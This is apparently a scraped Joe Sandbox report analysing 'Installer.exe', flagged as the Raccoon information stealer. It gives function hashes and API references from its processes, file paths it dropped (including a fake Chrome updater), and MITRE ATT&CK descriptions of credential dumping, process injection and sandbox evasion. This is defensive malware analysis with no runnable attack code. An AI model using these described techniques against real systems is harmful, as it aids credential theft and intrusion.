Uniqueness Score: -1.00%

Function 00007FF6CF74C018 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6CF74C040
_set_statfp.LIBCMT ref: 00007FF6CF74C05B
_set_statfp.LIBCMT ref: 00007FF6CF74C077
_set_statfp.LIBCMT ref: 00007FF6CF74C0B3

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 041a4966a8ba57cdc89a9aeb49da8fe3ffc622ff941f16d3338b45aaaa7e4d0e
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4411582FE5CA0342F6581B26F9553751B406F69377F084634EAEE8A2F68F1D98814934

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF74AA90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6CF74ABA7
GetLastError.KERNEL32 ref: 00007FF6CF74ABC9

Strings

U, xrefs: 00007FF6CF74AB53

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: e8fe97cd1d34dca0c093a2271587e9e4441a3310f6d28e3a5bd42cb743194989
Instruction ID: b91a25349d67cd3a278814f750e7ba475208e8a79b2c45e1bc9e02316324fcd6
Opcode Fuzzy Hash: e8fe97cd1d34dca0c093a2271587e9e4441a3310f6d28e3a5bd42cb743194989
Instruction Fuzzy Hash: 9241C526B18A4182EB208F26F4447A97B61FB88795F804035EE8DC7B54EF3CD441CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF745DA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6CF745DDD
LCMapStringW.KERNEL32 ref: 00007FF6CF745E65

Strings

LCMapStringEx, xrefs: 00007FF6CF745DC0, 00007FF6CF745DD1

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8bc6e62d1d6712ddba1f51ee41c7a82200dca671a137ede2f40163f5337e134e
Instruction ID: a0ff942384a305d9474a3e8f7da4f1a2d964c403cbbc769864924e0c3e64c1b8
Opcode Fuzzy Hash: 8bc6e62d1d6712ddba1f51ee41c7a82200dca671a137ede2f40163f5337e134e
Instruction Fuzzy Hash: 54110B36608B8186D760CF56F4402AABBA5FB89B94F544136EECD83B19CF3CD4408B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF742770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6CF741C7F), ref: 00007FF6CF7427B4
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6CF741C7F), ref: 00007FF6CF7427FA

Strings

csm, xrefs: 00007FF6CF7427E7

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: a4d85b7688ed9e74255989eddf61d295c19794bce683f152e6b315804430d993
Instruction ID: 3a8a322be27459e7f1b4d0e690ae8ff2a2a4a457ab2f93069169d991de01cf19
Opcode Fuzzy Hash: a4d85b7688ed9e74255989eddf61d295c19794bce683f152e6b315804430d993
Instruction Fuzzy Hash: A2113D36618B4182EB518F16F540269BBA0FB88B95F184234EFCC47B64DF3CD551CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF745D40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6CF745D71
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6CF745D8B

Strings

InitializeCriticalSectionEx, xrefs: 00007FF6CF745D65

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: d6bfb35a1214d95a632c0605933b5605a806a1e5255e3f4e9cd663fb56330631
Instruction ID: 54937434dbd06037d9aeab77e12fef228fea5eb55da5474fa07f787a1e512cd7
Opcode Fuzzy Hash: d6bfb35a1214d95a632c0605933b5605a806a1e5255e3f4e9cd663fb56330631
Instruction Fuzzy Hash: B4F05E29B08B5282FA149F43B5404A96B20AF48BA1F448135EADE83B55CE3CD485CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF745CEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6CF745D15
TlsSetValue.KERNEL32(?,?,?,00007FF6CF7453FE,?,?,?,00007FF6CF7439C5,?,?,?,00007FF6CF741024), ref: 00007FF6CF745D2C

Strings

FlsSetValue, xrefs: 00007FF6CF745D02

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: ff34e3be3070d93f73fa99bd98a7cc0622fdd7322c4ceeed094891cbe669bbc1
Instruction ID: bad24d4e57ad741c41d36a545af4d045b14c21ac8c55ee0be1d1d54647514c23
Opcode Fuzzy Hash: ff34e3be3070d93f73fa99bd98a7cc0622fdd7322c4ceeed094891cbe669bbc1
Instruction Fuzzy Hash: D3E06569A0850292FA044F52F4445F92B21AF48792F588135E9CD86765CE3CD844CE70

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 1716, Parent PID: 3064COMMON

Executed Functions

Function 00007FF8164C067D Relevance: 1.8, Strings: 1, Instructions: 559COMMON

Download Yara Rule

Strings

P4Oz, xrefs: 00007FF8164C06F2

Memory Dump Source

Source File: 0000003A.00000002.617997131.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8164c0000_powershell.jbxd

Similarity

API ID:
String ID: P4Oz
API String ID: 0-236607002
Opcode ID: 09ee9b2745ad1c1b1ada99e9c8b3f33c731aeb7fb9ffd9378c8fa3a36283e5d4
Instruction ID: 31007162ccb0cf04be6417d97180ea336b479dc4a7208928ff8891d26d1cc245
Opcode Fuzzy Hash: 09ee9b2745ad1c1b1ada99e9c8b3f33c731aeb7fb9ffd9378c8fa3a36283e5d4
Instruction Fuzzy Hash: CCF1E422E0DFC64FE796962858646B57FE1EF53BA0B0902FBD088CB2D3D9099C55C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163F3023 Relevance: .6, Instructions: 623COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003A.00000002.617304995.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8163f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e78e8bb2a6623371c87e27b4b5b4755cb2fda8c9ad803628636931b6e63f2fc
Instruction ID: b3934aa54b168c73bfc0da3caef47354de7c4f574beb33f5dfc73f60716fa0c2
Opcode Fuzzy Hash: 1e78e8bb2a6623371c87e27b4b5b4755cb2fda8c9ad803628636931b6e63f2fc
Instruction Fuzzy Hash: 99D1A031A18A4E8FEF84DF1CC445AE97BE1FF98350F1442AAD449D7296CA35E881CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163F1FB7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003A.00000002.617304995.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8163f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13206e386618810fac14cc69eeeaa75432489ace481aa8384f47cadc50742087
Instruction ID: 367cb9c193c1268b65007b7b85d4d2f9e9ad908f101007d4435189e26f0e8479
Opcode Fuzzy Hash: 13206e386618810fac14cc69eeeaa75432489ace481aa8384f47cadc50742087
Instruction Fuzzy Hash: 7741353760CA155BC700BA59F4419EAFBA4FFD53B1F00027BE189CB141EA24A59A87E2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8164C082A Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003A.00000002.617997131.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8164c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4799216d27094bc0726455778ecd1f6ae4f2c3a3863601ffb9f01151b09cc251
Instruction ID: 1c4844902284b3d82489b3ae7c29aaa5df70a621743fd2c589fdad8f59a86da4
Opcode Fuzzy Hash: 4799216d27094bc0726455778ecd1f6ae4f2c3a3863601ffb9f01151b09cc251
Instruction Fuzzy Hash: A131F422E1EEC74FF7A9962C18656786AD1EF42BB0B1942BAC08DC73D2DD099C14C361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163F1CC5 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003A.00000002.617304995.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8163f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a76052ea81e02e3825b0a0cc0780f9c3c50e28d73f586589662a58de335941
Instruction ID: e69b052711b175404bc450d20a658959fecd23cee6e0c50469acaf4d94635cb6
Opcode Fuzzy Hash: e7a76052ea81e02e3825b0a0cc0780f9c3c50e28d73f586589662a58de335941
Instruction Fuzzy Hash: 3521D63051CF494FD749EF18D4916B9B7E0FF96361F2005BDE0CAC7192EA26A482C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163F2DD8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003A.00000002.617304995.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8163f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d9338ea78d84f309eaed46c1a572d7a51c642d8126ce21f0907e06b2c60bd4f
Instruction ID: f7d6173e8865a83d086a2444b4ad865e26f3c95ae6961c0cd1858b9e26883423
Opcode Fuzzy Hash: 8d9338ea78d84f309eaed46c1a572d7a51c642d8126ce21f0907e06b2c60bd4f
Instruction Fuzzy Hash: 75F0303276CA084FDB4C9A0CF843AB573D1EB89330B40016EF48BC6696E917B8428686

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163F2D94 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003A.00000002.617304995.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_58_2_7ff8163f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba3c73a71cf932f5a0ae6f24f6193904a2ef3ccdeddce1e2a055de86870ecf4
Instruction ID: 2adc52e0022089ce96066fe5a6311be79380fdecf1e2e28fd2c1d721cd34e9b9
Opcode Fuzzy Hash: 9ba3c73a71cf932f5a0ae6f24f6193904a2ef3ccdeddce1e2a055de86870ecf4
Instruction Fuzzy Hash: 72E0E53276C6084F9B5CDA0CF8539F573D1E789334B40016FE48BC6697E916F8438685

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

C:\Users\user\AppData\LocalLow\429Z7OXjgaea

C:\Users\user\AppData\LocalLow\6KsQ7L4Hx3I5

C:\Users\user\AppData\LocalLow\994232qd0NPW

C:\Users\user\AppData\LocalLow\MfU3390p.exe

C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe

C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

C:\Users\user\AppData\LocalLow\freebl3.dll

Windows Analysis Report
Installer.exe

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

